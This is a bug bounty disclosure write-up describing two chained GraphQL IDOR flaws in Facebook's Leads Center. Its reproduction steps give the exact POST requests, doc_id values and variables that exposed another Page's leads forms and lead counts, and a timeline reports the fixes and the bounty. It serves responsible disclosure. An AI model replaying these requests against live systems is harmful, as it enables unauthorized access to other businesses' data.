Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)

By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious user could have exposed the leads form details of any Facebook Page or Facebook Business Account.

Impact :

Advertisers spend a lot of time, energy and money optimizing their leads campaigns and doing countless A/B tests in order to get the right performing ad. By exposing the leads form details and the total number of leads captured through paid advertising, a malicious advertiser could have spy on a targeted Facebook Page or a competitor to “steal” and copy all the winning/profitable lead ads without investing a single dollar in advertising.

Description of Facebook Lead Ads

Steps to Reproduce:

1) First GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following parameters in the request body:

&variables={“pageID”:”X”}&doc_id=3388026827877743

Where X is the targeted Facebook Page ID.

The returned response will disclose the leads form details of the targeted Facebook Page.

2) Second GraphQL IDOR

Send a POST request to https://www.facebook.com/api/graphql/ with required CSRF parameters and the following additional parameters in the request body:

&variables={“pageID”:”X”,”start_time”:null,”end_time”:null,”reminder_start_time”:1610481600,”reminder_end_time”:1610568000,”stage_id”:null,”owner_id”:null,”form_id”:”X”,”label_id”:null,”name_search_term”:null,”answer_search_term”:null,”email_search_term”:null,”notes_search_term”:null,”phone_search_term”:null,”adgroup_id”:null,”campaign_id”:null,”campaign_group_id”:null,”pageSize”:20,”expiring_type”:null,”is_unread”:false}&doc_id=3547538925278909

Where X is the Facebook Page ID and form_id is the targeted leads form ID leaked by the first GraphQL IDOR vulnerability.

The returned response will display the total number of leads captured through paid advertising by the targeted Facebook Page.

Timeline

January 5, 2021: Report Sent
January 6, 2021: Acknowledged by Facebook
January 13, 2021: Fixed by Facebook
January 13, 2021: I added a new vulnerable GraphQL request to the report
January 15, 2021: Fixed by Facebook
January 15, 2021: I added another vulnerable GraphQL request to the report
January 21, 2021: Fixed by Facebook
February 1, 2021: Bounty awarded

Twitter: https://twitter.com/amineaboud

Entrepreneur & cyber security enthusiast doing bug bounty for fun.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store